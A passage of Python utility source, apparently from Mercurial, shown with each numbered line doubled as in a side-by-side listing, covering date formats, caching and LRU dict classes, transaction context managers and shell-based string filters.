552 '%a %b %d %I:%M:%S%p %Y',
553 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
553 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
554 '%b %d %H:%M:%S %Y',
554 '%b %d %H:%M:%S %Y',
555 '%b %d %I:%M:%S%p %Y',
555 '%b %d %I:%M:%S%p %Y',
556 '%b %d %H:%M:%S',
556 '%b %d %H:%M:%S',
557 '%b %d %I:%M:%S%p',
557 '%b %d %I:%M:%S%p',
558 '%b %d %H:%M',
558 '%b %d %H:%M',
559 '%b %d %I:%M%p',
559 '%b %d %I:%M%p',
560 '%b %d %Y',
560 '%b %d %Y',
561 '%b %d',
561 '%b %d',
562 '%H:%M:%S',
562 '%H:%M:%S',
563 '%I:%M:%S%p',
563 '%I:%M:%S%p',
564 '%H:%M',
564 '%H:%M',
565 '%I:%M%p',
565 '%I:%M%p',
566 )
566 )
567
567
568 extendeddateformats = defaultdateformats + (
568 extendeddateformats = defaultdateformats + (
569 "%Y",
569 "%Y",
570 "%Y-%m",
570 "%Y-%m",
571 "%b",
571 "%b",
572 "%b %Y",
572 "%b %Y",
573 )
573 )
574
574
575 def cachefunc(func):
575 def cachefunc(func):
576 '''cache the result of function calls'''
576 '''cache the result of function calls'''
577 # XXX doesn't handle keywords args
577 # XXX doesn't handle keywords args
578 if func.__code__.co_argcount == 0:
578 if func.__code__.co_argcount == 0:
579 cache = []
579 cache = []
580 def f():
580 def f():
581 if len(cache) == 0:
581 if len(cache) == 0:
582 cache.append(func())
582 cache.append(func())
583 return cache[0]
583 return cache[0]
584 return f
584 return f
585 cache = {}
585 cache = {}
586 if func.__code__.co_argcount == 1:
586 if func.__code__.co_argcount == 1:
587 # we gain a small amount of time because
587 # we gain a small amount of time because
588 # we don't need to pack/unpack the list
588 # we don't need to pack/unpack the list
589 def f(arg):
589 def f(arg):
590 if arg not in cache:
590 if arg not in cache:
591 cache[arg] = func(arg)
591 cache[arg] = func(arg)
592 return cache[arg]
592 return cache[arg]
593 else:
593 else:
594 def f(*args):
594 def f(*args):
595 if args not in cache:
595 if args not in cache:
596 cache[args] = func(*args)
596 cache[args] = func(*args)
597 return cache[args]
597 return cache[args]
598
598
599 return f
599 return f
600
600
601 class cow(object):
601 class cow(object):
602 """helper class to make copy-on-write easier
602 """helper class to make copy-on-write easier
603
603
604 Call preparewrite before doing any writes.
604 Call preparewrite before doing any writes.
605 """
605 """
606
606
607 def preparewrite(self):
607 def preparewrite(self):
608 """call this before writes, return self or a copied new object"""
608 """call this before writes, return self or a copied new object"""
609 if getattr(self, '_copied', 0):
609 if getattr(self, '_copied', 0):
610 self._copied -= 1
610 self._copied -= 1
611 return self.__class__(self)
611 return self.__class__(self)
612 return self
612 return self
613
613
614 def copy(self):
614 def copy(self):
615 """always do a cheap copy"""
615 """always do a cheap copy"""
616 self._copied = getattr(self, '_copied', 0) + 1
616 self._copied = getattr(self, '_copied', 0) + 1
617 return self
617 return self
618
618
619 class sortdict(collections.OrderedDict):
619 class sortdict(collections.OrderedDict):
620 '''a simple sorted dictionary
620 '''a simple sorted dictionary
621
621
622 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
622 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
623 >>> d2 = d1.copy()
623 >>> d2 = d1.copy()
624 >>> d2
624 >>> d2
625 sortdict([('a', 0), ('b', 1)])
625 sortdict([('a', 0), ('b', 1)])
626 >>> d2.update([(b'a', 2)])
626 >>> d2.update([(b'a', 2)])
627 >>> list(d2.keys()) # should still be in last-set order
627 >>> list(d2.keys()) # should still be in last-set order
628 ['b', 'a']
628 ['b', 'a']
629 '''
629 '''
630
630
631 def __setitem__(self, key, value):
631 def __setitem__(self, key, value):
632 if key in self:
632 if key in self:
633 del self[key]
633 del self[key]
634 super(sortdict, self).__setitem__(key, value)
634 super(sortdict, self).__setitem__(key, value)
635
635
636 if pycompat.ispypy:
636 if pycompat.ispypy:
637 # __setitem__() isn't called as of PyPy 5.8.0
637 # __setitem__() isn't called as of PyPy 5.8.0
638 def update(self, src):
638 def update(self, src):
639 if isinstance(src, dict):
639 if isinstance(src, dict):
640 src = src.iteritems()
640 src = src.iteritems()
641 for k, v in src:
641 for k, v in src:
642 self[k] = v
642 self[k] = v
643
643
644 class cowdict(cow, dict):
644 class cowdict(cow, dict):
645 """copy-on-write dict
645 """copy-on-write dict
646
646
647 Be sure to call d = d.preparewrite() before writing to d.
647 Be sure to call d = d.preparewrite() before writing to d.
648
648
649 >>> a = cowdict()
649 >>> a = cowdict()
650 >>> a is a.preparewrite()
650 >>> a is a.preparewrite()
651 True
651 True
652 >>> b = a.copy()
652 >>> b = a.copy()
653 >>> b is a
653 >>> b is a
654 True
654 True
655 >>> c = b.copy()
655 >>> c = b.copy()
656 >>> c is a
656 >>> c is a
657 True
657 True
658 >>> a = a.preparewrite()
658 >>> a = a.preparewrite()
659 >>> b is a
659 >>> b is a
660 False
660 False
661 >>> a is a.preparewrite()
661 >>> a is a.preparewrite()
662 True
662 True
663 >>> c = c.preparewrite()
663 >>> c = c.preparewrite()
664 >>> b is c
664 >>> b is c
665 False
665 False
666 >>> b is b.preparewrite()
666 >>> b is b.preparewrite()
667 True
667 True
668 """
668 """
669
669
670 class cowsortdict(cow, sortdict):
670 class cowsortdict(cow, sortdict):
671 """copy-on-write sortdict
671 """copy-on-write sortdict
672
672
673 Be sure to call d = d.preparewrite() before writing to d.
673 Be sure to call d = d.preparewrite() before writing to d.
674 """
674 """
675
675
676 class transactional(object):
676 class transactional(object):
677 """Base class for making a transactional type into a context manager."""
677 """Base class for making a transactional type into a context manager."""
678 __metaclass__ = abc.ABCMeta
678 __metaclass__ = abc.ABCMeta
679
679
680 @abc.abstractmethod
680 @abc.abstractmethod
681 def close(self):
681 def close(self):
682 """Successfully closes the transaction."""
682 """Successfully closes the transaction."""
683
683
684 @abc.abstractmethod
684 @abc.abstractmethod
685 def release(self):
685 def release(self):
686 """Marks the end of the transaction.
686 """Marks the end of the transaction.
687
687
688 If the transaction has not been closed, it will be aborted.
688 If the transaction has not been closed, it will be aborted.
689 """
689 """
690
690
691 def __enter__(self):
691 def __enter__(self):
692 return self
692 return self
693
693
694 def __exit__(self, exc_type, exc_val, exc_tb):
694 def __exit__(self, exc_type, exc_val, exc_tb):
695 try:
695 try:
696 if exc_type is None:
696 if exc_type is None:
697 self.close()
697 self.close()
698 finally:
698 finally:
699 self.release()
699 self.release()
700
700
701 @contextlib.contextmanager
701 @contextlib.contextmanager
702 def acceptintervention(tr=None):
702 def acceptintervention(tr=None):
703 """A context manager that closes the transaction on InterventionRequired
703 """A context manager that closes the transaction on InterventionRequired
704
704
705 If no transaction was provided, this simply runs the body and returns
705 If no transaction was provided, this simply runs the body and returns
706 """
706 """
707 if not tr:
707 if not tr:
708 yield
708 yield
709 return
709 return
710 try:
710 try:
711 yield
711 yield
712 tr.close()
712 tr.close()
713 except error.InterventionRequired:
713 except error.InterventionRequired:
714 tr.close()
714 tr.close()
715 raise
715 raise
716 finally:
716 finally:
717 tr.release()
717 tr.release()
718
718
719 @contextlib.contextmanager
719 @contextlib.contextmanager
720 def nullcontextmanager():
720 def nullcontextmanager():
721 yield
721 yield
722
722
723 class _lrucachenode(object):
723 class _lrucachenode(object):
724 """A node in a doubly linked list.
724 """A node in a doubly linked list.
725
725
726 Holds a reference to nodes on either side as well as a key-value
726 Holds a reference to nodes on either side as well as a key-value
727 pair for the dictionary entry.
727 pair for the dictionary entry.
728 """
728 """
729 __slots__ = (u'next', u'prev', u'key', u'value')
729 __slots__ = (u'next', u'prev', u'key', u'value')
730
730
731 def __init__(self):
731 def __init__(self):
732 self.next = None
732 self.next = None
733 self.prev = None
733 self.prev = None
734
734
735 self.key = _notset
735 self.key = _notset
736 self.value = None
736 self.value = None
737
737
738 def markempty(self):
738 def markempty(self):
739 """Mark the node as emptied."""
739 """Mark the node as emptied."""
740 self.key = _notset
740 self.key = _notset
741
741
742 class lrucachedict(object):
742 class lrucachedict(object):
743 """Dict that caches most recent accesses and sets.
743 """Dict that caches most recent accesses and sets.
744
744
745 The dict consists of an actual backing dict - indexed by original
745 The dict consists of an actual backing dict - indexed by original
746 key - and a doubly linked circular list defining the order of entries in
746 key - and a doubly linked circular list defining the order of entries in
747 the cache.
747 the cache.
748
748
749 The head node is the newest entry in the cache. If the cache is full,
749 The head node is the newest entry in the cache. If the cache is full,
750 we recycle head.prev and make it the new head. Cache accesses result in
750 we recycle head.prev and make it the new head. Cache accesses result in
751 the node being moved to before the existing head and being marked as the
751 the node being moved to before the existing head and being marked as the
752 new head node.
752 new head node.
753 """
753 """
754 def __init__(self, max):
754 def __init__(self, max):
755 self._cache = {}
755 self._cache = {}
756
756
757 self._head = head = _lrucachenode()
757 self._head = head = _lrucachenode()
758 head.prev = head
758 head.prev = head
759 head.next = head
759 head.next = head
760 self._size = 1
760 self._size = 1
761 self._capacity = max
761 self._capacity = max
762
762
763 def __len__(self):
763 def __len__(self):
764 return len(self._cache)
764 return len(self._cache)
765
765
766 def __contains__(self, k):
766 def __contains__(self, k):
767 return k in self._cache
767 return k in self._cache
768
768
769 def __iter__(self):
769 def __iter__(self):
770 # We don't have to iterate in cache order, but why not.
770 # We don't have to iterate in cache order, but why not.
771 n = self._head
771 n = self._head
772 for i in range(len(self._cache)):
772 for i in range(len(self._cache)):
773 yield n.key
773 yield n.key
774 n = n.next
774 n = n.next
775
775
776 def __getitem__(self, k):
776 def __getitem__(self, k):
777 node = self._cache[k]
777 node = self._cache[k]
778 self._movetohead(node)
778 self._movetohead(node)
779 return node.value
779 return node.value
780
780
781 def __setitem__(self, k, v):
781 def __setitem__(self, k, v):
782 node = self._cache.get(k)
782 node = self._cache.get(k)
783 # Replace existing value and mark as newest.
783 # Replace existing value and mark as newest.
784 if node is not None:
784 if node is not None:
785 node.value = v
785 node.value = v
786 self._movetohead(node)
786 self._movetohead(node)
787 return
787 return
788
788
789 if self._size < self._capacity:
789 if self._size < self._capacity:
790 node = self._addcapacity()
790 node = self._addcapacity()
791 else:
791 else:
792 # Grab the last/oldest item.
792 # Grab the last/oldest item.
793 node = self._head.prev
793 node = self._head.prev
794
794
795 # At capacity. Kill the old entry.
795 # At capacity. Kill the old entry.
796 if node.key is not _notset:
796 if node.key is not _notset:
797 del self._cache[node.key]
797 del self._cache[node.key]
798
798
799 node.key = k
799 node.key = k
800 node.value = v
800 node.value = v
801 self._cache[k] = node
801 self._cache[k] = node
802 # And mark it as newest entry. No need to adjust order since it
802 # And mark it as newest entry. No need to adjust order since it
803 # is already self._head.prev.
803 # is already self._head.prev.
804 self._head = node
804 self._head = node
805
805
806 def __delitem__(self, k):
806 def __delitem__(self, k):
807 node = self._cache.pop(k)
807 node = self._cache.pop(k)
808 node.markempty()
808 node.markempty()
809
809
810 # Temporarily mark as newest item before re-adjusting head to make
810 # Temporarily mark as newest item before re-adjusting head to make
811 # this node the oldest item.
811 # this node the oldest item.
812 self._movetohead(node)
812 self._movetohead(node)
813 self._head = node.next
813 self._head = node.next
814
814
815 # Additional dict methods.
815 # Additional dict methods.
816
816
817 def get(self, k, default=None):
817 def get(self, k, default=None):
818 try:
818 try:
819 return self._cache[k].value
819 return self._cache[k].value
820 except KeyError:
820 except KeyError:
821 return default
821 return default
822
822
823 def clear(self):
823 def clear(self):
824 n = self._head
824 n = self._head
825 while n.key is not _notset:
825 while n.key is not _notset:
826 n.markempty()
826 n.markempty()
827 n = n.next
827 n = n.next
828
828
829 self._cache.clear()
829 self._cache.clear()
830
830
831 def copy(self):
831 def copy(self):
832 result = lrucachedict(self._capacity)
832 result = lrucachedict(self._capacity)
833 n = self._head.prev
833 n = self._head.prev
834 # Iterate in oldest-to-newest order, so the copy has the right ordering
834 # Iterate in oldest-to-newest order, so the copy has the right ordering
835 for i in range(len(self._cache)):
835 for i in range(len(self._cache)):
836 result[n.key] = n.value
836 result[n.key] = n.value
837 n = n.prev
837 n = n.prev
838 return result
838 return result
839
839
840 def _movetohead(self, node):
840 def _movetohead(self, node):
841 """Mark a node as the newest, making it the new head.
841 """Mark a node as the newest, making it the new head.
842
842
843 When a node is accessed, it becomes the freshest entry in the LRU
843 When a node is accessed, it becomes the freshest entry in the LRU
844 list, which is denoted by self._head.
844 list, which is denoted by self._head.
845
845
846 Visually, let's make ``N`` the new head node (* denotes head):
846 Visually, let's make ``N`` the new head node (* denotes head):
847
847
848 previous/oldest <-> head <-> next/next newest
848 previous/oldest <-> head <-> next/next newest
849
849
850 ----<->--- A* ---<->-----
850 ----<->--- A* ---<->-----
851 | |
851 | |
852 E <-> D <-> N <-> C <-> B
852 E <-> D <-> N <-> C <-> B
853
853
854 To:
854 To:
855
855
856 ----<->--- N* ---<->-----
856 ----<->--- N* ---<->-----
857 | |
857 | |
858 E <-> D <-> C <-> B <-> A
858 E <-> D <-> C <-> B <-> A
859
859
860 This requires the following moves:
860 This requires the following moves:
861
861
862 C.next = D (node.prev.next = node.next)
862 C.next = D (node.prev.next = node.next)
863 D.prev = C (node.next.prev = node.prev)
863 D.prev = C (node.next.prev = node.prev)
864 E.next = N (head.prev.next = node)
864 E.next = N (head.prev.next = node)
865 N.prev = E (node.prev = head.prev)
865 N.prev = E (node.prev = head.prev)
866 N.next = A (node.next = head)
866 N.next = A (node.next = head)
867 A.prev = N (head.prev = node)
867 A.prev = N (head.prev = node)
868 """
868 """
869 head = self._head
869 head = self._head
870 # C.next = D
870 # C.next = D
871 node.prev.next = node.next
871 node.prev.next = node.next
872 # D.prev = C
872 # D.prev = C
873 node.next.prev = node.prev
873 node.next.prev = node.prev
874 # N.prev = E
874 # N.prev = E
875 node.prev = head.prev
875 node.prev = head.prev
876 # N.next = A
876 # N.next = A
877 # It is tempting to do just "head" here, however if node is
877 # It is tempting to do just "head" here, however if node is
878 # adjacent to head, this will do bad things.
878 # adjacent to head, this will do bad things.
879 node.next = head.prev.next
879 node.next = head.prev.next
880 # E.next = N
880 # E.next = N
881 node.next.prev = node
881 node.next.prev = node
882 # A.prev = N
882 # A.prev = N
883 node.prev.next = node
883 node.prev.next = node
884
884
885 self._head = node
885 self._head = node
886
886
887 def _addcapacity(self):
887 def _addcapacity(self):
888 """Add a node to the circular linked list.
888 """Add a node to the circular linked list.
889
889
890 The new node is inserted before the head node.
890 The new node is inserted before the head node.
891 """
891 """
892 head = self._head
892 head = self._head
893 node = _lrucachenode()
893 node = _lrucachenode()
894 head.prev.next = node
894 head.prev.next = node
895 node.prev = head.prev
895 node.prev = head.prev
896 node.next = head
896 node.next = head
897 head.prev = node
897 head.prev = node
898 self._size += 1
898 self._size += 1
899 return node
899 return node
900
900
901 def lrucachefunc(func):
901 def lrucachefunc(func):
902 '''cache most recent results of function calls'''
902 '''cache most recent results of function calls'''
903 cache = {}
903 cache = {}
904 order = collections.deque()
904 order = collections.deque()
905 if func.__code__.co_argcount == 1:
905 if func.__code__.co_argcount == 1:
906 def f(arg):
906 def f(arg):
907 if arg not in cache:
907 if arg not in cache:
908 if len(cache) > 20:
908 if len(cache) > 20:
909 del cache[order.popleft()]
909 del cache[order.popleft()]
910 cache[arg] = func(arg)
910 cache[arg] = func(arg)
911 else:
911 else:
912 order.remove(arg)
912 order.remove(arg)
913 order.append(arg)
913 order.append(arg)
914 return cache[arg]
914 return cache[arg]
915 else:
915 else:
916 def f(*args):
916 def f(*args):
917 if args not in cache:
917 if args not in cache:
918 if len(cache) > 20:
918 if len(cache) > 20:
919 del cache[order.popleft()]
919 del cache[order.popleft()]
920 cache[args] = func(*args)
920 cache[args] = func(*args)
921 else:
921 else:
922 order.remove(args)
922 order.remove(args)
923 order.append(args)
923 order.append(args)
924 return cache[args]
924 return cache[args]
925
925
926 return f
926 return f
927
927
928 class propertycache(object):
928 class propertycache(object):
929 def __init__(self, func):
929 def __init__(self, func):
930 self.func = func
930 self.func = func
931 self.name = func.__name__
931 self.name = func.__name__
932 def __get__(self, obj, type=None):
932 def __get__(self, obj, type=None):
933 result = self.func(obj)
933 result = self.func(obj)
934 self.cachevalue(obj, result)
934 self.cachevalue(obj, result)
935 return result
935 return result
936
936
937 def cachevalue(self, obj, value):
937 def cachevalue(self, obj, value):
938 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
938 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
939 obj.__dict__[self.name] = value
939 obj.__dict__[self.name] = value
940
940
941 def clearcachedproperty(obj, prop):
941 def clearcachedproperty(obj, prop):
942 '''clear a cached property value, if one has been set'''
942 '''clear a cached property value, if one has been set'''
943 if prop in obj.__dict__:
943 if prop in obj.__dict__:
944 del obj.__dict__[prop]
944 del obj.__dict__[prop]
945
945
946 def pipefilter(s, cmd):
946 def pipefilter(s, cmd):
947 '''filter string S through command CMD, returning its output'''
947 '''filter string S through command CMD, returning its output'''
948 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
948 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
949 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
949 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
950 pout, perr = p.communicate(s)
950 pout, perr = p.communicate(s)
951 return pout
951 return pout
952
952
953 def tempfilter(s, cmd):
953 def tempfilter(s, cmd):
954 '''filter string S through a pair of temporary files with CMD.
954 '''filter string S through a pair of temporary files with CMD.
955 CMD is used as a template to create the real command to be run,
955 CMD is used as a template to create the real command to be run,
956 with the strings INFILE and OUTFILE replaced by the real names of
956 with the strings INFILE and OUTFILE replaced by the real names of
957 the temporary files generated.'''
957 the temporary files generated.'''
958 inname, outname = None, None
958 inname, outname = None, None
959 try:
959 try:
960 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
960 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
961 fp = os.fdopen(infd, pycompat.sysstr('wb'))
961 fp = os.fdopen(infd, pycompat.sysstr('wb'))
962 fp.write(s)
962 fp.write(s)
963 fp.close()
963 fp.close()
964 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
964 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
965 os.close(outfd)
965 os.close(outfd)
966 cmd = cmd.replace('INFILE', inname)
966 cmd = cmd.replace('INFILE', inname)
967 cmd = cmd.replace('OUTFILE', outname)
967 cmd = cmd.replace('OUTFILE', outname)
968 code = os.system(cmd)
968 code = os.system(cmd)
969 if pycompat.sysplatform == 'OpenVMS' and code & 1:
969 if pycompat.sysplatform == 'OpenVMS' and code & 1:
970 code = 0
970 code = 0
971 if code:
971 if code:
972 raise Abort(_("command '%s' failed: %s") %
972 raise Abort(_("command '%s' failed: %s") %
973 (cmd, explainexit(code)))
973 (cmd, explainexit(code)))
974 return readfile(outname)
974 return readfile(outname)
975 finally:
975 finally:
976 try:
976 try:
977 if inname:
977 if inname:
978 os.unlink(inname)
978 os.unlink(inname)
979 except OSError:
979 except OSError:
980 pass
980 pass
981 try:
981 try:
982 if outname:
982 if outname:
983 os.unlink(outname)
983 os.unlink(outname)
984 except OSError:
984 except OSError:
985 pass
985 pass
986
986
987 filtertable = {
987 filtertable = {
988 'tempfile:': tempfilter,
988 'tempfile:': tempfilter,
989 'pipe:': pipefilter,
989 'pipe:': pipefilter,
990 }
990 }
991
991
992 def filter(s, cmd):
992 def filter(s, cmd):
993 "filter a string through a command that transforms its input to its output"
993 "filter a string through a command that transforms its input to its output"
994 for name, fn in filtertable.iteritems():
994 for name, fn in filtertable.iteritems():
995 if cmd.startswith(name):
995 if cmd.startswith(name):
996 return fn(s, cmd[len(name):].lstrip())
996 return fn(s, cmd[len(name):].lstrip())
997 return pipefilter(s, cmd)
997 return pipefilter(s, cmd)
998
998
999 def binary(s):
999 def binary(s):
1000 """return true if a string is binary data"""
1000 """return true if a string is binary data"""
1001 return bool(s and '\0' in s)
1001 return bool(s and '\0' in s)
1002
1002
1003 def increasingchunks(source, min=1024, max=65536):
1003 def increasingchunks(source, min=1024, max=65536):
1004 '''return no less than min bytes per chunk while data remains,
1004 '''return no less than min bytes per chunk while data remains,
1005 doubling min after each chunk until it reaches max'''
1005 doubling min after each chunk until it reaches max'''
1006 def log2(x):
1006 def log2(x):
1007 if not x:
1007 if not x:
1008 return 0
1008 return 0
1009 i = 0
1009 i = 0
1010 while x:
1010 while x:
1011 x >>= 1
1011 x >>= 1
1012 i += 1
1012 i += 1
1013 return i - 1
1013 return i - 1
1014
1014
1015 buf = []
1015 buf = []
1016 blen = 0
1016 blen = 0
1017 for chunk in source:
1017 for chunk in source:
1018 buf.append(chunk)
1018 buf.append(chunk)
1019 blen += len(chunk)
1019 blen += len(chunk)
1020 if blen >= min:
1020 if blen >= min:
1021 if min < max:
1021 if min < max:
1022 min = min << 1
1022 min = min << 1
1023 nmin = 1 << log2(blen)
1023 nmin = 1 << log2(blen)
1024 if nmin > min:
1024 if nmin > min:
1025 min = nmin
1025 min = nmin
1026 if min > max:
1026 if min > max:
1027 min = max
1027 min = max
1028 yield ''.join(buf)
1028 yield ''.join(buf)
1029 blen = 0
1029 blen = 0
1030 buf = []
1030 buf = []
1031 if buf:
1031 if buf:
1032 yield ''.join(buf)
1032 yield ''.join(buf)
1033
1033
1034 Abort = error.Abort
1034 Abort = error.Abort
1035
1035
1036 def always(fn):
1036 def always(fn):
1037 return True
1037 return True
1038
1038
1039 def never(fn):
1039 def never(fn):
1040 return False
1040 return False
1041
1041
1042 def nogc(func):
1042 def nogc(func):
1043 """disable garbage collector
1043 """disable garbage collector
1044
1044
1045 Python's garbage collector triggers a GC each time a certain number of
1045 Python's garbage collector triggers a GC each time a certain number of
1046 container objects (the number being defined by gc.get_threshold()) are
1046 container objects (the number being defined by gc.get_threshold()) are
1047 allocated even when marked not to be tracked by the collector. Tracking has
1047 allocated even when marked not to be tracked by the collector. Tracking has
1048 no effect on when GCs are triggered, only on what objects the GC looks
1048 no effect on when GCs are triggered, only on what objects the GC looks
1049 into. As a workaround, disable GC while building complex (huge)
1049 into. As a workaround, disable GC while building complex (huge)
1050 containers.
1050 containers.
1051
1051
1052 This garbage collector issue have been fixed in 2.7. But it still affect
1052 This garbage collector issue have been fixed in 2.7. But it still affect
1053 CPython's performance.
1053 CPython's performance.
1054 """
1054 """
1055 def wrapper(*args, **kwargs):
1055 def wrapper(*args, **kwargs):
1056 gcenabled = gc.isenabled()
1056 gcenabled = gc.isenabled()
1057 gc.disable()
1057 gc.disable()
1058 try:
1058 try:
1059 return func(*args, **kwargs)
1059 return func(*args, **kwargs)
1060 finally:
1060 finally:
1061 if gcenabled:
1061 if gcenabled:
1062 gc.enable()
1062 gc.enable()
1063 return wrapper
1063 return wrapper
1064
1064
1065 if pycompat.ispypy:
1065 if pycompat.ispypy:
1066 # PyPy runs slower with gc disabled
1066 # PyPy runs slower with gc disabled
1067 nogc = lambda x: x
1067 nogc = lambda x: x
1068
1068
1069 def pathto(root, n1, n2):
1069 def pathto(root, n1, n2):
1070 '''return the relative path from one place to another.
1070 '''return the relative path from one place to another.
1071 root should use os.sep to separate directories
1071 root should use os.sep to separate directories
1072 n1 should use os.sep to separate directories
1072 n1 should use os.sep to separate directories
1073 n2 should use "/" to separate directories
1073 n2 should use "/" to separate directories
1074 returns an os.sep-separated path.
1074 returns an os.sep-separated path.
1075
1075
1076 If n1 is a relative path, it's assumed it's
1076 If n1 is a relative path, it's assumed it's
1077 relative to root.
1077 relative to root.
1078 n2 should always be relative to root.
1078 n2 should always be relative to root.
1079 '''
1079 '''
1080 if not n1:
1080 if not n1:
1081 return localpath(n2)
1081 return localpath(n2)
1082 if os.path.isabs(n1):
1082 if os.path.isabs(n1):
1083 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1083 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1084 return os.path.join(root, localpath(n2))
1084 return os.path.join(root, localpath(n2))
1085 n2 = '/'.join((pconvert(root), n2))
1085 n2 = '/'.join((pconvert(root), n2))
1086 a, b = splitpath(n1), n2.split('/')
1086 a, b = splitpath(n1), n2.split('/')
1087 a.reverse()
1087 a.reverse()
1088 b.reverse()
1088 b.reverse()
1089 while a and b and a[-1] == b[-1]:
1089 while a and b and a[-1] == b[-1]:
1090 a.pop()
1090 a.pop()
1091 b.pop()
1091 b.pop()
1092 b.reverse()
1092 b.reverse()
1093 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1093 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1094
1094
1095 def mainfrozen():
1095 def mainfrozen():
1096 """return True if we are a frozen executable.
1096 """return True if we are a frozen executable.
1097
1097
1098 The code supports py2exe (most common, Windows only) and tools/freeze
1098 The code supports py2exe (most common, Windows only) and tools/freeze
1099 (portable, not much used).
1099 (portable, not much used).
1100 """
1100 """
1101 return (safehasattr(sys, "frozen") or # new py2exe
1101 return (safehasattr(sys, "frozen") or # new py2exe
1102 safehasattr(sys, "importers") or # old py2exe
1102 safehasattr(sys, "importers") or # old py2exe
1103 imp.is_frozen(u"__main__")) # tools/freeze
1103 imp.is_frozen(u"__main__")) # tools/freeze
1104
1104
1105 # the location of data files matching the source code
1105 # the location of data files matching the source code
1106 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1106 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1107 # executable version (py2exe) doesn't support __file__
1107 # executable version (py2exe) doesn't support __file__
1108 datapath = os.path.dirname(pycompat.sysexecutable)
1108 datapath = os.path.dirname(pycompat.sysexecutable)
1109 else:
1109 else:
1110 datapath = os.path.dirname(pycompat.fsencode(__file__))
1110 datapath = os.path.dirname(pycompat.fsencode(__file__))
1111
1111
1112 i18n.setdatapath(datapath)
1112 i18n.setdatapath(datapath)
1113
1113
1114 _hgexecutable = None
1114 _hgexecutable = None
1115
1115
1116 def hgexecutable():
1116 def hgexecutable():
1117 """return location of the 'hg' executable.
1117 """return location of the 'hg' executable.
1118
1118
1119 Defaults to $HG or 'hg' in the search path.
1119 Defaults to $HG or 'hg' in the search path.
1120 """
1120 """
1121 if _hgexecutable is None:
1121 if _hgexecutable is None:
1122 hg = encoding.environ.get('HG')
1122 hg = encoding.environ.get('HG')
1123 mainmod = sys.modules[pycompat.sysstr('__main__')]
1123 mainmod = sys.modules[pycompat.sysstr('__main__')]
1124 if hg:
1124 if hg:
1125 _sethgexecutable(hg)
1125 _sethgexecutable(hg)
1126 elif mainfrozen():
1126 elif mainfrozen():
1127 if getattr(sys, 'frozen', None) == 'macosx_app':
1127 if getattr(sys, 'frozen', None) == 'macosx_app':
1128 # Env variable set by py2app
1128 # Env variable set by py2app
1129 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1129 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1130 else:
1130 else:
1131 _sethgexecutable(pycompat.sysexecutable)
1131 _sethgexecutable(pycompat.sysexecutable)
1132 elif (os.path.basename(
1132 elif (os.path.basename(
1133 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1133 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1134 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1134 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1135 else:
1135 else:
1136 exe = findexe('hg') or os.path.basename(sys.argv[0])
1136 exe = findexe('hg') or os.path.basename(sys.argv[0])
1137 _sethgexecutable(exe)
1137 _sethgexecutable(exe)
1138 return _hgexecutable
1138 return _hgexecutable
1139
1139
1140 def _sethgexecutable(path):
1140 def _sethgexecutable(path):
1141 """set location of the 'hg' executable"""
1141 """set location of the 'hg' executable"""
1142 global _hgexecutable
1142 global _hgexecutable
1143 _hgexecutable = path
1143 _hgexecutable = path
1144
1144
1145 def _isstdout(f):
1145 def _isstdout(f):
1146 fileno = getattr(f, 'fileno', None)
1146 fileno = getattr(f, 'fileno', None)
1147 return fileno and fileno() == sys.__stdout__.fileno()
1147 return fileno and fileno() == sys.__stdout__.fileno()
1148
1148
1149 def shellenviron(environ=None):
1149 def shellenviron(environ=None):
1150 """return environ with optional override, useful for shelling out"""
1150 """return environ with optional override, useful for shelling out"""
1151 def py2shell(val):
1151 def py2shell(val):
1152 'convert python object into string that is useful to shell'
1152 'convert python object into string that is useful to shell'
1153 if val is None or val is False:
1153 if val is None or val is False:
1154 return '0'
1154 return '0'
1155 if val is True:
1155 if val is True:
1156 return '1'
1156 return '1'
1157 return str(val)
1157 return str(val)
1158 env = dict(encoding.environ)
1158 env = dict(encoding.environ)
1159 if environ:
1159 if environ:
1160 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1160 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1161 env['HG'] = hgexecutable()
1161 env['HG'] = hgexecutable()
1162 return env
1162 return env
1163
1163
1164 def system(cmd, environ=None, cwd=None, out=None):
1164 def system(cmd, environ=None, cwd=None, out=None):
1165 '''enhanced shell command execution.
1165 '''enhanced shell command execution.
1166 run with environment maybe modified, maybe in different dir.
1166 run with environment maybe modified, maybe in different dir.
1167
1167
1168 if out is specified, it is assumed to be a file-like object that has a
1168 if out is specified, it is assumed to be a file-like object that has a
1169 write() method. stdout and stderr will be redirected to out.'''
1169 write() method. stdout and stderr will be redirected to out.'''
1170 try:
1170 try:
1171 stdout.flush()
1171 stdout.flush()
1172 except Exception:
1172 except Exception:
1173 pass
1173 pass
1174 cmd = quotecommand(cmd)
1174 cmd = quotecommand(cmd)
1175 env = shellenviron(environ)
1175 env = shellenviron(environ)
1176 if out is None or _isstdout(out):
1176 if out is None or _isstdout(out):
1177 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1177 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1178 env=env, cwd=cwd)
1178 env=env, cwd=cwd)
